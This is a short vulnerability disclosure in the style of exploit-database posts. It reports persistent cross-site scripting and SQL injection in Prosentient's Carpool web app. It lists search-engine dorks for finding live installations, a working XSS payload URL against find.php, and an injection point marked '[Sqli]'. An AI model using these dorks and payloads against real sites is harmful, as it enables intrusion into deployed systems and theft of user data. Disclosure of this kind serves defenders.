Share
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
# Exploit Title: Carpool Web App Persistent Cross-Site Scripting - Sql Injection Vulnerability   
# Date: 29/06/2019  
# Url Vendor: http://www.prosentient.com.au/  
# Vendor Name: Prosentient  
# Version: 1.0  
# Author: TaurusOmar   
# Tiwtter: @TaurusOmar_  
# Email: servicios@taurusomar.com  
# Home: https://taurusomar.com/  
# Tested On: Parrot Security OS  
# Risk: Medium  
# Dork: intext:"Powered by Prosentient Systems"  
# Dork: intext:"COPYRIGHT ยฉ 2015 CCAI & DPTI"  
  
# Carpool systems  
  
Carpool by Prosentient Systems is an efficient and eco-friendly system that connects drivers and passengers to save money, make new acquaintances and help the environment. This service was first commissioned to meet the needs of the NSW Ministry of Transport. But we are experts at hosting both corporate and government systems. It is a practical way of sharing transport costs and reducing road congestion and vehicle pollution, and is already operating in a number of local government areas in Australia, and is also available in the United Kingdom.   
  
---------------------------------  
+ CROSS SITE SCRIPTING +   
---------------------------------  
# Exploiting Description - Persistent Cross-Site Scripting   
http://site.com/find.php?from=">><img src=x onerror=confirm("TaurusOmar")>  
  
  
# Proof Concept  
https://i.imgur.com/kYd9xHX.png  
  
------------------------  
+ SQL INJECTION +  
------------------------  
# Exploiting Description - Sql Injection   
http://site.com/find.php?from= [Sqli]  
  
#Proof Concept  
https://i.imgur.com/A9kFXy2.png